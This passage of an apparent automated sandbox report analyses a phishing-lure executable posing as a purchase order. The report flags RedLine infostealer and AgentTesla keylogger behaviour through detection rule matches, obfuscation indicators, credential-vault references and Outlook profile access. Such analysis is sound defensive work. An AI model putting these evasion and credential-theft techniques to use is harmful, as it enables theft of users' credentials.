                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00423C810_2_00423C81
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00411E780_2_00411E78
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00442E0C0_2_00442E0C
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00420EC00_2_00420EC0
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044CF170_2_0044CF17
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00444FD20_2_00444FD2
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_03973A580_2_03973A58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00408C602_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040DC112_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00407C3F2_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00418CCC2_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00406CA02_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004028B02_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004182442_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004016502_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F202_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004193C42_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004187882_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F892_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402B902_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004073A02_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B0D0A82_2_00B0D0A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B0DCC02_2_00B0DCC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B010302_2_00B01030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B0D3F02_2_00B0D3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F5C5802_2_05F5C580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F592482_2_05F59248
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F58A502_2_05F58A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F500402_2_05F50040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F500062_2_05F50006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068D94B12_2_068D94B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068D67382_2_068D6738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068DE0702_2_068DE070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: String function: 004115D7 appears 36 times
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: String function: 00416C70 appears 39 times
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: String function: 00445AE0 appears 65 times
                  Source: [Purchase Order] PO2411024.exe, 00000000.00000003.2499351397.0000000003FC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs [Purchase Order] PO2411024.exe
                  Source: [Purchase Order] PO2411024.exe, 00000000.00000003.2498688882.000000000411D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs [Purchase Order] PO2411024.exe
                  Source: [Purchase Order] PO2411024.exe, 00000000.00000002.2501872609.0000000003E00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename90cf818a-462d-43ad-9b06-442ae93cc408.exe4 vs [Purchase Order] PO2411024.exe
                  Source: [Purchase Order] PO2411024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.[Purchase Order] PO2411024.exe.3e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.5060000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.5060000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.38d5678.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.38d5678.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4db0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4db0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.264f73e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.264f73e.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.3924698.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.3924698.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.38d6560.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.38d6560.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.2650626.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.2650626.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000002.00000002.4936860765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000002.2501872609.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@2/2
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeFile created: C:\Users\user\AppData\Local\Temp\autB5AE.tmpJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCommand line argument: v0_2_0040D6B0
                  Source: [Purchase Order] PO2411024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: [Purchase Order] PO2411024.exeReversingLabs: Detection: 55%
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeFile read: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\[Purchase Order] PO2411024.exe "C:\Users\user\Desktop\[Purchase Order] PO2411024.exe"
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\[Purchase Order] PO2411024.exe"
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\[Purchase Order] PO2411024.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: [Purchase Order] PO2411024.exe, 00000000.00000003.2499766443.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, [Purchase Order] PO2411024.exe, 00000000.00000003.2497465196.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: [Purchase Order] PO2411024.exe, 00000000.00000003.2499766443.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, [Purchase Order] PO2411024.exe, 00000000.00000003.2497465196.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: [Purchase Order] PO2411024.exeStatic PE information: real checksum: 0xa961f should be: 0xea8d3
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B0474E push ebp; retf 2_2_00B04760
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068DB7CD push es; iretd 2_2_068DB7E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068DB7C9 push es; iretd 2_2_068DB7CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068DB71D push es; iretd 2_2_068DB720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068DB711 push es; iretd 2_2_068DB71C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068DB721 push es; iretd 2_2_068DB724
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068DB744 push es; iretd 2_2_068DB748
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068DB76D push es; iretd 2_2_068DB770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_068D1EBA pushfd ; ret 2_2_068D1EBD
                  Source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L6y3KM9EoqO9j', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L6y3KM9EoqO9j', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L6y3KM9EoqO9j', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L6y3KM9EoqO9j', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L6y3KM9EoqO9j', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
